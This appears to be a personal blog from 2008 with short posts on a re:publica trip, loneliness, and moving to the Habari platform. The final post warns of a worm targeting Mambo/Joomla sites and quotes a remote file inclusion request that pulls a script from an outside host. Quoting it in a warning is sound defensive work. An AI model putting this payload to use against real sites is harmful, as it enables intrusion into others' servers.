re: re:publica 08

See you in Berlin…

Let’s go!

Okay, March was not that great. The weather was wild and mostly sucked, I got sick, didn’t get much work done despite working all the time, and it generally felt like little progress was made. Well, sad no more! April’s coming!

  • April 1st: Lingen
  • April 2nd-4th: re:publica 08, Berlin
  • April 5th/6th: Berlin, maybe
  • April 19th/20th (tent.): Amsterdam?
  • April 26th/27th: PHP Unconference, Hamburg

With fresh spirits, we shall change the world, one step at a time.

The urge to fly is now…

I have a growing urge to get away, get out, meet new people and generally take my mind off $WORK.

Don’t get me wrong, work is good, we’re doing cool projects, but as a small company without VC backing or anything, it is all too often that you limited resources prevent you from doing the next cool thing. So, I want more resources to hire more good people.

More generally speaking, I want to meet more good people, but I don’t really know where to start. I missed some web-2.0 / open source / social commerce / etc. type events after moving, which sucked. I’m hoping to catch the next few, sitting in Starbucks and chatting with fellow geeks and geekettes about geeky stuff. Less slouch-coding, more exchange of ideas, more shared projects, more collaboration… too bad all that stuff happens in the city center, and I live on the fringes. The cat is happy, but it doesn’t exactly help with meeting people.

Yes, I said it. I feel lonely. I don’t have as much time for myself, making friends, or just stroking the cat as I would like, and it annoys me, not the least because I keep thinking that I could do it all better, if only I would try harder.

And then I try to convince myself that that’s rubbish.

Migrated to Habari; HSoC

I finally moved over to this blogging platform thingamajick I’m writing with the great folks of the Habari Project. The theme is the wonderful Charcoal by Ali B. / dmondark with minor tweaks.

Habari unfortunately didn’t get accepted into this year’s Summer of Code, although we made the short list. Anyway, we decided we’ll just hold our own Summer of Love Habari Summer of Collaboration. We will try to get fancy t-shirts, too. Check it out.

Habari. Mzuri sana!

Statusnachrichten allüberall.

Sagt XING:

Worm looking for vulnerable Mambo/Joomla installs

Some worm is doing the rounds. Requests look like this:

/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ebbw.net/components/com_magazine/layouts/id.txt?

The payload only checks for the user id, but can easily be changed of course.

Update your stuffs and update your tripwires.
